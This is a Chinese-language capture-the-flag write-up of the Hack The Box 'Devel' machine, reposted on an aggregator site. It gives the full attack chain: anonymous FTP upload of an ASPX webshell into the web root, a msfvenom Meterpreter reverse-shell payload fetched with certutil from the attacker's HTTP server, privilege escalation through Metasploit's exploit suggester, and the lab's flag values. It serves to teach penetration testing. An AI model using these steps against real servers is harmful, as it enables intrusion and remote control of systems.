HTB:Devel[WriteUP]

目录

连接至HTB服务器并启动靶机

1.What is the name of the service is running on TCP port 21 on the target machine?

使用nmap对靶机TCP端口进行开放扫描

2.Which basic FTP command can be used to upload a single file onto the server?

尝试匿名连接至靶机FTP服务

查看FTP服务中的文件结构

3.Are files put into the FTP root available via the webserver?

使用浏览器访问靶机80端口

使用ffuf对靶机80端口页面进行路径FUZZ

尝试直接在FTP服务中往aspnet_client目录上传文件

4.What file extension is executed as a script on this webserver? Don't include the ..

将KALI自带的ASPX_WEBSHELL拷贝到当前目录下

​编辑

通过浏览器访问Webshell

还是老老实实走FTP服务,把马子传上去吧T_T

5.Which metasploit reconnaissance module can be used to list possible privilege escalation paths on a compromised system?

切换到提权扫描模块

6.Submit the flag located on the babis user's desktop.

7.Submit the flag located on the administrator's desktop.

USER_FLAG:933242a201e4f0b3d9aa931f32376d8c

ROOT_FLAG:d762d0f53467df1fa2e5910f0e2e44ed


连接至HTB服务器并启动靶机

靶机IP:10.10.10.5

分配IP:10.10.14.12


1.What is the name of the service is running on TCP port 21 on the target machine?

使用nmap对靶机TCP端口进行开放扫描

nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.10.5

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.10.5  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 19:39 EST
Nmap scan report for 10.10.10.5 (10.10.10.5)
Host is up (0.067s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 80.82 seconds

对靶机开放的TCP端口进行脚本、服务扫描

nmap -p 21,80 -sCV 10.10.10.5

由扫描信息可知,在VERSION栏目下21端口:Microsoft ftpd


2.Which basic FTP command can be used to upload a single file onto the server?

由nmap扫描可见,靶机FTP服务允许匿名登录

尝试匿名连接至靶机FTP服务

ftp 10.10.10.5

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.

在FTP服务中,使用put命令上传文件

查看FTP服务中的文件结构

ftp> dir
229 Entering Extended Passive Mode (|||49159|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp> cd aspnet_client
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49160|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          system_web
226 Transfer complete.
ftp> cd system_web
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49161|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          2_0_50727
226 Transfer complete.
ftp> cd 2_0_50727
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49162|)
125 Data connection already open; Transfer starting.
226 Transfer complete.


3.Are files put into the FTP root available via the webserver?

使用浏览器访问靶机80端口

通过Wappalyzer插件可知,该页面使用ASP.NET作为框架

使用ffuf对靶机80端口页面进行路径FUZZ

ffuf -u http://10.10.10.5/FUZZ -w ../dictionary/common.txt

这里扫出来的aspnet_client目录很像上文FTP中dir出来的目录

尝试直接在FTP服务中往aspnet_client目录上传文件

提示被阻拦了,大概率是因为没有权限,这里回到主目录下再次尝试put上传

ftp> cd ../
250 CWD command successful.
ftp> put This_Is_A_Test
local: This_Is_A_Test remote: This_Is_A_Test
229 Entering Extended Passive Mode (|||49170|)
125 Data connection already open; Transfer starting.
     0        0.00 KiB/s
226 Transfer complete.

提示成功上传,使用curl访问该文件(这里换了个写有内容的test.txt文件)

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo 'This is a test' > test.txt (上传了这个文件)

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl http://10.10.10.5/test.txt
This is a test

经过测试,可以通过靶机FTP服务将文件上传至Web目录下(YES)


4.What file extension is executed as a script on this webserver? Don't include the ..

因为上文通过Wappalyzer插件可知,靶机Web页使用ASP.NET框架

所以大概率使用的脚本语言是:ASP、ASPX

将KALI自带的ASPX_WEBSHELL拷贝到当前目录下

cp /usr/share/webshells/aspx/cmdasp.aspx $(pwd) 

改个名,然后通过FTP服务直接上传到靶机Web目录下

mv cmdasp.aspx shell.aspx

通过浏览器访问Webshell

执行systeminfo命令或者echo %PROCESSOR_ARCHITECTURE%命令查看靶机系统位数

攻击机本地生成一个x32的Meterpreter马子

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=1425 -f exe > reverse.exe

攻击机本地通过python开启http服务

python -m http.server 7777

靶机通过Webshell将马子下载

certutil.exe -urlcache -split -f http://10.10.14.12:7777/reverse.exe reverse.exe

这个命令下载慢的一批就算了而且还容易断联,powershell的下载命令还没法用

还是老老实实走FTP服务,把马子传上去吧T_T

意外的失败了,可能是因为文件太大了?(传了两次回头再看发现已经有一个成功上传)

首先查找一下马子的位置

cd /d c:\ && dir /s reverse.exe

然后在MSF里配置好监听模块的参数

在Webshell中直接运行马子,直接输入文件完整路径即可

c:\inetpub\wwwroot\reverse.exe

Emmmmm,好像是因为文件不兼容?

最后看了官方WP,捏马的居然是直接用msfvenom生成aspx格式的马子

重新配置MSF中的监听参数并不断生成不同的MSF马子依然无法弹回Meterpreter

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.12:1425
[*] Sending stage (176198 bytes) to 10.10.10.5

一直卡在这.......(这里严重怀疑是靶机网络有问题,或者我的网络有问题)

最后更新了Metasploit解决问题


5.Which metasploit reconnaissance module can be used to list possible privilege escalation paths on a compromised system?

在Metasploit中,常用的本地提权扫描模块:local_exploit_suggester

切换到提权扫描模块

use post/multi/recon/local_exploit_suggester

SESSION设置为Meterpreter收回后的会话

set SESSION 1

从冒绿光的模块里随便选几个出来,配置好参数直接提权即可


6.Submit the flag located on the babis user's desktop.

7.Submit the flag located on the administrator's desktop.

查找user_flag、root_flag位置,并查看其内容

meterpreter > search -f user.txt
Found 1 result...
=================

Path                             Size (bytes)  Modified (UTC)
----                             ------------  --------------
c:\Users\babis\Desktop\user.txt  34            2024-11-06 22:29:47 -0500

meterpreter > search -f root.txt
Found 1 result...
=================

Path                                     Size (bytes)  Modified (UTC)
----                                     ------------  --------------
c:\Users\Administrator\Desktop\root.txt  34            2024-11-06 22:29:47 -0500

meterpreter > shell
Process 2748 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
d762d0f53467df1fa2e5910f0e2e44ed

c:\windows\system32\inetsrv>type c:\Users\babis\Desktop\user.txt
type c:\Users\babis\Desktop\user.txt
933242a201e4f0b3d9aa931f32376d8c

USER_FLAG:933242a201e4f0b3d9aa931f32376d8c

ROOT_FLAG:d762d0f53467df1fa2e5910f0e2e44ed

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/8206.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

Hadoop集群的高可用(HA)-(2、搭建resourcemanager的高可用)

第一步&#xff1a;检查mapred-site.xml &#xff0c;里面只有yarn配置和historyServer的配置&#xff0c;不需要修改 第二步&#xff1a;修改yarn-site.xml <?xml version"1.0"?> <!-- Licensed under the Apache License, Version 2.0 (the "Lic…

golang笔记

golang笔记 一、内存逃逸 本应在栈中内存,被分配到了堆中 1 返回指针对象 在外部被使用 2 reutrn 函数 使用了上面方法的敞亮 3 入参是interface{} 动态参数 4 make超过栈大小 -gcflags"-m"查看分配内存信息 返回变量vs返回指针 返回变量, 会多一步复制变量, 返回…

纹理分析——统计分析方法

一. 灰度共生矩阵法(Gray Level Co-occurrence Matrix, GLCM ) 灰度共生矩阵又称为灰度空间相关矩阵&#xff0c;是通过研究灰度的空间相关特性来描述纹理的常用方法。&#xff08;也称为联合概率矩阵&#xff09;它作为传统的图像纹理分析方法已广泛应用于数字图像处理的许多…

IT维修记录表导入接口的思路

上篇文章讲了IT设备信息表的导入接口的思路&#xff0c;这篇文章趁热打铁&#xff0c;把IT维修记录表的导入接口的思路给说一下。 首先我们要知道IT维修记录表的数据是什么来的&#xff1f;这个问题必须要搞懂&#xff0c;不搞懂的话对接下来的思路其实是不利的。IT维修记录表…

场景解决方案丨迎战电商大促,企业管理跟踪驾驶舱助力中小企业打赢决胜之战

该方案已沉淀为➡️订单物流信息跟踪模板&#xff0c;点击&#x1f517;即可体验 随着互联网技术的发展和市场经济的变化&#xff0c;各行业的线上竞争愈发激烈。一方面&#xff0c;互联网平台凭借便捷的服务和丰富的产品吸引了大量客户&#xff1b;另一方面&#xff0c;复杂多…

WebRTC 环境搭建

主题 本文主要描述webrtc开发过程中所需的环境搭建 环境&#xff1a; 运行环境&#xff1a;ubuntu 20.04 Node.js环境搭建 安装编译 Node.js 所需的依赖包: sudo apt-get update sudo apt-get install -y build-essential libssl-dev 下载 Node.js 源码: curl -sL htt…

Python从入门到高手7.5节-实现冒泡排序算法

目录 7.5.1 排序算法简介 7.5.2 冒泡排序算法原理 7.5.3 冒泡排序算法实现 7.5.4 永不放弃 7.5.1 排序算法简介 所谓排序&#xff0c;是指将数据集合中的元素按从小到大的顺序进行排列&#xff0c;或按从大到小的顺序进行排列。 前者称为升序排序&#xff0c;后者称为降序…

vue-quill-editor富文本编辑器

效果图&#xff1a; 1、下载安装vue-quill-editor npm install vue-quill-editor --save图片缩放、拖拽 npm install quill-image-drop-module -S //允许粘贴图像并将其拖放到编辑器中。 npm install quill-image-resize-module -S //允许调整图像大小<template>&…

TCP是怎样工作的网络拥塞控制理论和算法部分记录

参考资料 https://github.com/ituring/tcp-book 流量控制、窗口控制和拥塞控制的关系 流量控制、窗口控制和拥塞控制的关系如图所示 窗口控制是上层的概念&#xff0c;核心思路是基于滑动窗口技术传输数据。而确定发送窗口大小的方法有流量控制和拥塞控制两种 流量控制&…

NVR管理平台EasyNVR多个NVR同时管理对接天翼云云存储的一些关键信息和优势

在视频监控领域&#xff0c;随着技术的不断进步&#xff0c;存储方式的选择变得尤为重要。传统的本地存储方式受限于硬件容量&#xff0c;而云存储则以其强大的数据处理能力和弹性扩展性&#xff0c;成为视频数据存储的理想选择。NVR管理平台EasyNVR作为一款领先的视频汇聚与管…

饲料加工机器设备由搅拌机粉碎机颗粒机组成

饲料加工机器设备在现代养殖业中扮演着至关重要的角色&#xff0c;它们不仅提高了饲料的生产效率&#xff0c;还优化了饲料的营养价值。其中&#xff0c;饲料粉碎机、搅拌机和颗粒机是饲料加工流程中的三大核心设备。 想象一下&#xff0c;一把把粗糙的原料&#xff0c;在粉碎…

oracle数据坏块处理(二)-逻辑坏块重新格式化处理

1、问题描述 在使用duplicate搭建DG时报错 包括rman copy&#xff0c;rman备份 2、问题分析 由于数据文件逻辑坏块导致物理备份不能正常进行。 使用rman检查数据文件47 SELECT tablespace_name, segment_type, owner, segment_name FROM dba_extents WHERE file_id 47 a…

在IDEA使用arthas实现jar包方法耗时统计

1.背景 对于依赖jar包中的方法内部耗时统计&#xff0c;传统的手写StopWatch不适用&#xff0c;这儿采用arthas统计。 官网文档比较详细&#xff0c;trace | arthas 使用版本&#xff1a; arthas-boot version: 4.0.2 IntelliJ IDEA 2023.3.3 2.使用介绍 2.1.启动需要检…

用于图像识别的判别图正则化技术

&#x1f3e1;作者主页&#xff1a;点击&#xff01; &#x1f916;编程探索专栏&#xff1a;点击&#xff01; ⏰️创作时间&#xff1a;2024年11月8日13点32分 点击开启你的论文编程之旅https://www.aspiringcode.com/content?id17210272021224&uid64a84f9640714755a…

Android Handler

Handler用于多线程消息分发和处理。与handler相关的几个对象&#xff1a;Message, Looper&#xff0c;MessageQueue, ThreadLocal. Handler是Message的消费者。 MessageQueue是容器。 Looper是整个Message分发的驱动。 Handler中有多种发送消息的方法&#xff0c;其中postxx…

Windows/Linux部署Qt并通过Qt Installer Framework制作安装包

本文参考 Qt Installer Framework Manual。 若要使用 Qt Installer Framework&#xff08;简称 QIF&#xff09;&#xff0c;需要在 Qt Online Installer 或 Qt Maintenance Tool 中确保该组件已安装&#xff08;QIF 组件在 Qt->Developer and Design Tools 下&#xff09;&…

【大数据学习 | kafka】消费者的分区分配规则

1. 概述 上面我们提到过&#xff0c;消费者有的时候会少于或者多于分区的个数&#xff0c;那么如果消费者少了有的消费者要消费多个分区的数据&#xff0c;如果消费者多了&#xff0c;有的消费者就可能没有分区的数据消费。 那么这个关系是如何分配的呢&#xff1f; 现在我们…

【开发】关于Java中String与Integer的小小知识点(使用等号对比引用对象)

一个很简单的小知识点 我们都知道&#xff0c;如果使用对比包装类型或对象&#xff0c;那么比较的都是两者之间的地址&#xff08;指针或句柄&#xff09;&#xff0c;而非对象本身&#xff0c;那么且看下方的代码。 public class A {public static void main(String[] args)…

2025年山东省考报名流程图解

2025年山东公务员考试备考开始 为大家整理了从笔试到录用的全部流程&#xff0c;希望可以帮助到你们&#xff01;参考2024年山东省考公告整理&#xff0c;请以最新公告为准&#xff01; 一、阅读公告和职位表 二、职位查询 三、网上报名 四、确认缴费 五、网上打印准考证 六、参…

网络安全入门篇之详细学习路线

什么是网络安全 网络安全可以基于攻击和防御视角来分类&#xff0c;我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术&#xff0c;而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 无论网络、Web、移动、桌面、云等哪个领域&#xff0c;都有攻与防两面性&…